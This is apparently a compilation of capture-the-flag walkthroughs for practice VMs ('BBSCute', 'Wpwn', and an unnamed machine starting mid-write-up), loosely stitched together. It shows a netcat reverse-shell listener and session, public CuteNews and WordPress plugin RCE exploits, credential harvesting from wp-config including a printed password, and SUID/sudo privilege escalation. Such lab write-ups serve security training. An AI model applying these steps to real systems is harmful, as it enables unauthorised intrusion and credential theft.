The networker binary is a lie. There isn’t anything in it that is helpful. It doesn’t take any input, it doesn’t open any ports, and the paths are all hard-coded. I’m sure there’s a way to edit the binary to add our own custom shell code to it, but I don’t have my OSCE yet and this is supposed to be an intermediate difficulty VM, so I’m not about to go try and deal with that.
Instead, I’m going to go back to my OSCP training
kali@kali:~$ sudo nc -nlvp 80
Password:
listening on [any] 80 ...
connect to [192.168.63.200] from (UNKNOWN) [192.168.63.49] 53601
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(jimmy) gid=1002(jimmy) groups=1002(jimmy)
$ ls -la
total 28
drwx------ 2 jimmy jimmy 4096 Jun 9 2017 .
drwxr-xr-x 5 root root 4096 Jun 9 2017 ..
-rw-r--r-- 1 root root 0 Mar 6 2020 .bash_history
-rw-r--r-- 1 jimmy jimmy 220 Jun 8 2017 .bash_logout
-rw-r--r-- 1 jimmy jimmy 3515 Jun 8 2017 .bashrc
-rw-r--r-- 1 jimmy jimmy 675 Jun 8 2017 .profile
-rwsrwxrwx 1 root root 7496 Jun 9 2017 networker
$ file networker
networker: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=bacc02fa5747f07430f55e0d5e70d4078800c9f5, not stripped
$ strings networker
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
puts
printf
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.1.3
GLIBC_2.0
UWVS
t$,U
[^_]
*** Networker 2.0 ***
/sbin/ifconfig
/bin/ping -c 1 localhost
Done
echo 'echo linux tool version 5'
;*2$"
GCC: (Debian 6.3.0-12) 6.3.0 20170406
crtstuff.c
__JCR_LIST__
--snip--
.dynamic
.got.plt
.data
.bss
.comment
$
.
pg-bbscute-play
BBSCute
Navigating to port 80 in the browser lands us on the default install page for Apache.
Running dirsearch.py against the target web server reveals index.php.
Index.php takes us to the login page for CuteNews. I tried some default credentials and was unable to access the system.
Instead, we can register as a new user to gain access. On the new-user registration page we are not able to load the captcha, which stops us from proceeding:
Reviewing the source of this page shows we do have a link for captcha.php.
Viewing this will show what the current captcha should be.
Entering this into the registration field will allow us to proceed with new user creation.
We can see that we are running CuteNews 2.1.2 as per the footer of the page. Searching for exploits with searchsploit shows the results below.
Searching further on Google for exploits we come across a PoC on GitHub located here: https://github.com/CRFSlick/CVE-2019-11447-POC.
Download the python script and the sad.gif files to the same directory. Run with the syntax shown below.
We can now run the following command to get a more usable reverse shell on a different listener:
From here I uploaded linpeas, which after executing identified the binary hping3 as having the SUID bit set, meaning we can execute the binary with root permissions.
Then, as per GTFOBins, we can execute it with the SUID bit to gain a root shell.
pg-wpwn-play
Wpwn
Running curl on port 80 simply shows a basic greeting for the machine by the creator.
With nothing else interesting we move on to directory enumeration with dirsearch.py.
With the common.txt wordlist we hit robots.txt and /wordpress. Robots contains no interesting information.
Moving over to the /wordpress directory we get the following page.
Other than this the WordPress site contains no interesting information. From here we can run WPScan in order to try and identify further information.
WPScan picks up the plugin ‘social-warfare’ as being installed and out of date.
Checking this against searchsploit reveals an RCE against the running version.
The vulnerability has been assigned CVE-2019-9978.
Description:
The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.
The following GitHub shows a PoC for this exploit.
As per the GitHub description we need to create a text file that will be hosted on our attacking machine with the contents of what we want to execute.
First I hosted a Python SimpleHTTPServer on my attacking machine.
I then downloaded the associated Python script and executed as per below.
In the example above the command included for test.txt was 'id'. From here I replaced the command with 'which nc' to see if netcat is on the target machine and then ran the exploit again.
As netcat is installed we can replace the command in the test.txt file with that of a netcat reverse shell.
Contents of test.txt:
I then set a netcat listener on my attacking machine:
Running the exploit again hangs the script as we receive a reverse shell.
We then upgrade the shell:
Moving back one directory in the shell we can then read the contents of wp-config for any MySQL database credentials.
We have gathered the credentials: wp_user:R3&]vzhHmMn9,:-5
From here I logged into MySQL and took the WordPress administrator’s hash. I was, however, unable to crack it. Looking on the box we have the user ‘takis’, so I decided to see if password reuse was in play and SSH in as takis.
Now that we are in as takis, I run sudo -l to check sudo permissions.
Looks like we can run all commands as any user without a password. A simple sudo /bin/bash will spawn us a root shell.